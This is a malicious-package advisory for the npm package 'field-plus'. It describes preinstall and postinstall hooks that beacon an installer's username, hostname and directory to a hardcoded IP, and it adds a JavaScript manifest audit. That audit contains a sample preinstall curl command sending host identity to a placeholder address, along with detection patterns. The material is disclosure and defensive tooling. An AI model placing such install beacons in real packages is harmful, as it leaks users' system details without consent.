MAL-2026-5777
Malicious code in field-plus (npm)
Details
## Source: amazon-inspector (0112dc4801bb261e86a2f68d5fd49b6c955bb4e82f872c72e61e49cc638ca91c)

package.json declares both preinstall and postinstall scripts that run curl against a hardcoded bare-IP HTTP endpoint (http://3.7.226.146:9000/callback), sending the installer's username ($(whoami)), hostname ($(hostname)), current working directory ($(pwd)), and a timestamp as query-string parameters. Output is suppressed and errors swallowed with `|| true` so the beacon stays silent during `npm install`. The tarball ships only package.json — `main: index.js` is declared but not present — so the package has no library functionality; its sole effect on installation is the identity beacon. Version 99.99.1 plus the description "testing field plus" is the canonical shape of a dependency-confusion / namespace-squat probe used to identify which organizations resolve an internal-named package from the public registry.
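
A manifest audit for the indicators described above, as an added example (not code from Amazon Inspector, npm, or this advisory). The function names, the sample manifest with its documentation IP and query parameter names, and the major-version threshold of 99 are assumptions made for illustration.

```javascript
// Constructed sample manifest modelled on the advisory's description. 203.0.113.10 is a
// documentation address (TEST-NET-3) and the query parameter names are made up.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "example-internal-lib",
  version: "99.99.1",
  main: "index.js",
  scripts: {
    preinstall: 'curl -s "http://203.0.113.10:9000/callback?u=$(whoami)&h=$(hostname)&d=$(pwd)" >/dev/null 2>&1 || true',
  },
});

// Hooks npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const SCRIPT_CHECKS = [
  ["network-tool", /\b(curl|wget)\b/],
  ["bare-ip-url", /https?:\/\/\d{1,3}(\.\d{1,3}){3}(?=[:\/"'\s]|$)/],
  ["plaintext-http", /\bhttp:\/\//],
  ["host-identity-substitution", /\$\((whoami|hostname|pwd)\)|`(whoami|hostname|pwd)`/],
  ["output-suppressed", />\s*\/dev\/null/],
  ["errors-swallowed", /\|\|\s*true\b/],
];

// Returns a list of { where, indicator } findings for one package.
// tarballFiles: paths shipped in the tarball (assumed input, e.g. taken from `npm pack --dry-run`).
function auditManifest(manifestText, tarballFiles) {
  const pkg = JSON.parse(manifestText);
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (typeof cmd !== "string") continue;
    for (const [indicator, pattern] of SCRIPT_CHECKS) {
      if (pattern.test(cmd)) findings.push({ where: hook, indicator });
    }
  }
  if (typeof pkg.main === "string" && !tarballFiles.includes(pkg.main.replace(/^\.\//, ""))) {
    findings.push({ where: "main", indicator: "entry-point-missing" });
  }
  // Assumed threshold: a major version of 99 or more counts as a squat-style version.
  if (parseInt(String(pkg.version).split(".")[0], 10) >= 99) {
    findings.push({ where: "version", indicator: "inflated-version" });
  }
  return findings;
}

// Block-worthy combination: an install hook that sends host identity to a bare IP.
function isInstallBeacon(findings) {
  const has = (i) => findings.some((f) => f.indicator === i && INSTALL_HOOKS.includes(f.where));
  return has("network-tool") && has("bare-ip-url") && has("host-identity-substitution");
}
```

Running the audit against the lockfile's resolved tarballs before install, or installing with `npm install --ignore-scripts`, keeps hooks like this from executing while the findings are reviewed.
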
Affected packages
No fixed version published yet for field-plus (npm). Pin to a known-safe version or switch to an alternative.